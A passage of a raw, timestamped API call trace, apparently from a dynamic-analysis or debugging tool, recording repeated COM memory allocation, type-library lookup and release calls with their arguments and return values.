(This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.025] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.025] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.025] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.025] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.025] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.025] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.025] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.025] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.025] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.026] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.026] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.026] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.026] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.026] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.026] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.026] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.026] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.026] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.026] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.026] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.026] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.026] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.026] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.027] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.027] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.027] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76db480 [0031.027] IMalloc:GetSize (This=0x7fefe015380, pv=0x76db480) returned 0x30 [0031.027] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.027] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.027] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.027] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.027] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.027] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.027] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.027] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.027] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.028] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.028] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666ea0 [0031.028] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666ea0) returned 0x28 [0031.028] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.028] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.033] IUnknown:Release (This=0xb4ccda8) returned 0x1 [0031.033] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x27, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cce58) returned 0x0 [0031.033] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb491370 [0031.033] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x18 [0031.038] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.039] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.039] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.039] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.039] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.039] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.039] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666ea0 [0031.039] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666ea0) returned 0x20 [0031.039] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76db480 [0031.039] IMalloc:GetSize (This=0x7fefe015380, pv=0x76db480) returned 0x30 [0031.045] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e5560 [0031.045] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e5560) returned 0x48 [0031.051] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.051] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.051] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.051] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.051] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.051] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.051] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.051] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.051] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb491370 [0031.051] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x18 [0031.051] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.051] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.052] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.052] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.054] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.054] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.054] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.054] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.054] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.054] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.054] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.054] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.054] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.054] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.054] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.054] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.054] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.054] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.056] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.056] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.058] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.058] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.060] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.061] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.061] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.061] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.061] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb491370 [0031.061] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x18 [0031.061] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666f90 [0031.061] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666f90) returned 0x20 [0031.063] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.063] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.068] IUnknown:Release (This=0xb4cce58) returned 0x1 [0031.068] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x2a, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd068) returned 0x0 [0031.068] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.068] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.068] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.068] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.069] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.069] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.070] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.070] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.076] IUnknown:Release (This=0xb4cd068) returned 0x1 [0031.076] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x2b, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd0c0) returned 0x0 [0031.076] IUnknown:Release (This=0xb4cd0c0) returned 0x1 [0031.076] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x2e, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd1c8) returned 0x0 [0031.076] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76db480 [0031.076] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7666f90 [0031.076] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666ea0 [0031.076] IMalloc:Alloc (This=0x7fefe015380, cb=0x32) returned 0x76dbb80 [0031.076] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7667680 [0031.077] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dbb40 [0031.077] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7666f60 [0031.077] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dba00 [0031.077] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7667020 [0031.077] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7667110 [0031.077] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666e70 [0031.077] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666de0 [0031.077] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666db0 [0031.077] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666d50 [0031.077] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666d20 [0031.077] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666cf0 [0031.077] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666cc0 [0031.077] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666c90 [0031.077] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666c60 [0031.077] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666c00 [0031.078] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7666bd0 [0031.078] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7666ba0 [0031.078] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666b70 [0031.078] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666b10 [0031.078] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76db7c0 [0031.078] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x7666ae0 [0031.078] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x7666ab0 [0031.078] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666a80 [0031.078] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666a50 [0031.078] IMalloc:Alloc (This=0x7fefe015380, cb=0x32) returned 0x76dbc00 [0031.078] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dbbc0 [0031.078] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dbd40 [0031.078] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x76669f0 [0031.078] IMalloc:Alloc (This=0x7fefe015380, cb=0x3c) returned 0xb4e5470 [0031.078] IMalloc:Alloc (This=0x7fefe015380, cb=0x3c) returned 0xb4e55b0 [0031.079] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666990 [0031.079] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666960 [0031.079] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666930 [0031.079] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dbc40 [0031.079] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dbc80 [0031.079] IMalloc:Alloc (This=0x7fefe015380, cb=0x32) returned 0x76dbe00 [0031.079] IMalloc:Alloc (This=0x7fefe015380, cb=0x32) returned 0x76dbe40 [0031.079] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666900 [0031.079] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76668d0 [0031.079] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76668a0 [0031.079] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dbe80 [0031.079] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dbec0 [0031.079] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dbf00 [0031.079] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dbf40 [0031.079] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666840 [0031.079] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666810 [0031.080] IMalloc:Alloc (This=0x7fefe015380, cb=0x32) returned 0x76dbf80 [0031.080] IMalloc:Alloc (This=0x7fefe015380, cb=0x32) returned 0x76dbfc0 [0031.080] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dc000 [0031.080] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dc040 [0031.080] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dc080 [0031.080] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dc0c0 [0031.080] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x76667e0 [0031.080] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x76667b0 [0031.080] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dc100 [0031.080] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dc140 [0031.080] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666780 [0031.080] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666750 [0031.080] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dc180 [0031.080] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dc1c0 [0031.080] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x76666f0 [0031.081] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x76666c0 [0031.081] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666690 [0031.081] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dc200 [0031.081] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dc240 [0031.081] IMalloc:Alloc (This=0x7fefe015380, cb=0x3c) returned 0xb4e5600 [0031.081] IMalloc:Alloc (This=0x7fefe015380, cb=0x3c) returned 0xb4e5650 [0031.081] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x7666660 [0031.081] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x7666630 [0031.081] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x76665d0 [0031.081] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb491370 [0031.081] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x76665a0 [0031.081] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666570 [0031.081] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666540 [0031.081] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x76664e0 [0031.081] IMalloc:Alloc (This=0x7fefe015380, cb=0x36) returned 0x76dc280 [0031.082] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x76664b0 [0031.082] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666480 [0031.082] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666450 [0031.082] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x76663f0 [0031.082] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x76663c0 [0031.082] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dc2c0 [0031.082] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dc300 [0031.082] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666390 [0031.082] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666360 [0031.082] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7666300 [0031.082] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x76662d0 [0031.082] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x76662a0 [0031.082] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666270 [0031.082] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7666210 [0031.082] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x76661e0 [0031.083] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x76661b0 [0031.083] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666180 [0031.083] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666150 [0031.083] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x76660f0 [0031.083] IMalloc:Alloc (This=0x7fefe015380, cb=0x400) returned 0xb515760 [0031.083] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0031.083] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491290 [0031.083] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490fd0 [0031.083] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490ff0 [0031.083] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490f30 [0031.083] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490d90 [0031.083] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490fb0 [0031.083] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491010 [0031.083] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491050 [0031.083] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.083] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491390 [0031.083] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4913b0 [0031.083] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4913d0 [0031.083] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4913f0 [0031.083] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491410 [0031.083] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491430 [0031.083] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491450 [0031.084] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491470 [0031.084] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491490 [0031.084] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.084] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914d0 [0031.084] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914f0 [0031.084] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491510 [0031.084] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491530 [0031.084] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491550 [0031.084] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.084] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491590 [0031.084] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915b0 [0031.084] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.084] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915f0 [0031.084] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491610 [0031.084] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491630 [0031.084] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491650 [0031.084] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491670 [0031.084] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491690 [0031.084] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4916b0 [0031.085] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4916d0 [0031.085] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4916f0 [0031.085] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491710 [0031.085] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491730 [0031.085] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491750 [0031.085] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491770 [0031.085] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491790 [0031.085] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4917b0 [0031.085] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4917d0 [0031.085] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4917f0 [0031.085] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491810 [0031.085] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491830 [0031.085] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491850 [0031.085] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491870 [0031.085] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491890 [0031.085] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4918b0 [0031.085] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4918d0 [0031.085] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4918f0 [0031.085] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491910 [0031.085] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491930 [0031.085] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491950 [0031.085] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491970 [0031.085] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491990 [0031.086] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4919b0 [0031.086] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4919d0 [0031.086] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4919f0 [0031.086] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a10 [0031.086] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a30 [0031.086] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a50 [0031.086] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a70 [0031.086] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a90 [0031.086] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ab0 [0031.086] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb491ad0 [0031.086] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x18 [0031.092] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.092] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.092] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.092] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.092] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.092] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.092] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76660c0 [0031.092] IMalloc:GetSize (This=0x7fefe015380, pv=0x76660c0) returned 0x20 [0031.093] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dc340 [0031.093] IMalloc:GetSize (This=0x7fefe015380, pv=0x76dc340) returned 0x30 [0031.098] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e5790 [0031.098] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e5790) returned 0x48 [0031.104] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.104] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.106] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.106] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.107] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.107] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.107] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.107] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.107] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.107] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.108] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.108] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.109] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.109] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.110] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.110] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.110] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.110] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.111] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.111] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.111] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.111] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.111] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.111] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.111] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.111] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.113] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.113] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.115] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.115] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.116] IMalloc:Alloc 